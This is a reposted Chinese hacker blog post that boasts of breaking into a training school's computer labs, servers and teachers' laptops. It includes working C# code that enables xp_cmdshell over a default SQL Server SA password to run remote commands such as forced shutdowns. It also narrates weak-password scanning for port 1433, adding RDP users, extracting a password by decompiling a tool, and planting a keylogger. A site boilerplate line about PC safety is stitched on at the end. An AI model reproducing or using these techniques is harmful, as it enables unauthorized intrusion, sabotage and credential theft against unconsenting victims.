入侵XX地区北大青鸟所有机器
发表时间:2023-05-27 来源:明辉站整理相关软件相关文章人气:
[摘要]作者:Trojan [ESST] 噩靈戰隊[Evil-Soul Security Team] 最近一直没时间写文章给大家,主要是因为我在北大青鸟上学,学习软件开发.时间少的要命.既然是玩黑的就...
作者:Trojan [ESST] 噩靈戰隊[Evil-Soul Security Team]
最近一直没时间写文章给大家,主要是因为我在北大青鸟上学,学习软件开发.时间少的要命.既然是玩黑的就要简单在青鸟内网渗透下.
简单介绍下青鸟的机房怎么安排的.一共6个机房,一个公用机房.老师办公室人手一个笔记本.六个机房的学生机器是类似这样的IP:192.168.1.x 不可以上网.机房里的教员机器(也就是老师的机器)有两个IP.一个是192.168.1.x,一个是192.168.0.x,为什么要弄成0.x呢,主要是办公室的机器IP是192.168.0.x的一人只有一个IP.老师在讲课的时候在机房要远程登陆自己的机器,也就是0.x的.里面有老师的讲课的PPT之类的东西.学校有一个FTP服务器是192.168.1.253这个IP.每个学员都有自己的FTP帐户(密码空,只有写入权限).教师有一个帐户,帐号是teacher密码我就不知道了.当学员想清理自己的FTP的时候就找老师..大概就是这个情况..
那天上课的时候无聊.想这搞搞同学的机器.每个学员都是administrator权限.sql server的SA密码统一123.直接利用xpcmdshell加一个shutdown-p就恶搞了他们几天.S1快毕业的时候有一节复习课.我和D38k70p同学就用C#写了个工具.为了方便恶搞..
简单发下C#的关键代码给大家研究:
private void btnGo_Click(object sender, EventArgs e)
{
try
{
//打开数据库
DBHelper.conn.Open();
//定义sql语句
string sql = "EXEC sp_configure 'xp_cmdshell',0 RECONFIGURE EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
SqlCommand comm = new SqlCommand(sql, DBHelper.conn);
try
{
comm.ExecuteNonQuery();
}
catch
{
comm.ExecuteNonQuery();
}
sql = string.Format("EXEC xp_cmdshell '{0}'", this.txtCmd.Text);
comm.CommandText = sql;
try
{
comm.ExecuteNonQuery();
}
catch
{
comm.ExecuteNonQuery();
}
SqlDataReader dr = comm.ExecuteReader();
while(dr.Read())
{
txtReturn.Text = txtReturn.Text + "\r\n" + dr[0].ToString();
}
dr.Close();
}
finally
{
DBHelper.conn.Close();
}
}
private void comboBox1_SelectedIndexChanged(object sender, EventArgs e)
{
//几个猥琐的命令
switch (this.comboBox1.Text)
{
case "瞬间关机":
this.txtCmd.Text = "shutdown -p";
break;
case "30秒关机":
this.txtCmd.Text = "shutdown -r";
break;
case "注销":
this.txtCmd.Text = "shutdown -f";
break;
}
}
private void btnEixt_Click(object sender, EventArgs e)
{
Application.Exit();
}
private void button1_Click(object sender, EventArgs e)
{
try
{
Ping pingSender = new Ping();
PingReply reply = pingSender.Send(txtIp.Text);
if (reply.Status == IPStatus.Success)
{
MessageBox.Show("Success");
}
else
{
MessageBox.Show("Fail");
}
}
catch(Exception ex)
{
MessageBox.Show(ex.Message);
}
}
private void btnLoginTest_Click(object sender, EventArgs e)
{
if (sqlConn())
{
MessageBox.Show("OK,U can kill him");
}
else
{
MessageBox.Show("The Password is wrong!");
}
}
public bool sqlConn()
{
ip = string.Format("Data Source={0};Database=master;user id ={1} ;pwd ={2}", this.txtIp.Text,txtUser.Text,txtPwd.Text);
DBHelper.conn = new SqlConnection(ip);
try
{
DBHelper.conn.Open();
return true;
}
catch
{
return false;
}
}
private void button2_Click(object sender, EventArgs e)
{
this.txtReturn.Text = "";
}
}
}
复制代码工具有了,可以开个3389加个用户啥的..通杀6个机房的学员机器.
但是机房的教员机器还没控制呢..不知道IP是多少.突然有一天在2机房老师架设了IIS叫我们用反射给程序实现在线升级的功能.我这一看IP是1.242.老师的IP肯定有规律的一机房的教师机是1.241,二机房的教师机IP是1.242,就是这个了..这样的话可以利用拿到教员机器的3389在去远程登陆老师的笔记本..老师的笔记本还是外网的.可以抓个肉鸡..
不知道教员机器SA密码是啥.于是找了个工具开始扫1433弱口令..扫了老半天终于扫到了..可以拿到3389了.过了几天,D38k70p童鞋不知道从哪个娃的FTP找到了一个清理FTP工具.我一看真好使..在坐车回家的路上和D38k70p童鞋讨论那个工具的原理.大概作者不是知道了teacher的密码就是sql的密码..回到家D38k70p就用Xenocode Fox 2007反汇编那个清理FTP工具..直接找到SA密码..第二天成功拿到服务器的权限..D38k70p童鞋说,既然搞了就把老师的笔记本也搞掉..我说好.上机的时候用最快的速度把老师的机器拿到权限.放个键盘记录工具...就这样拿到了教师的笔记本.校长室的笔记本就算了
上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。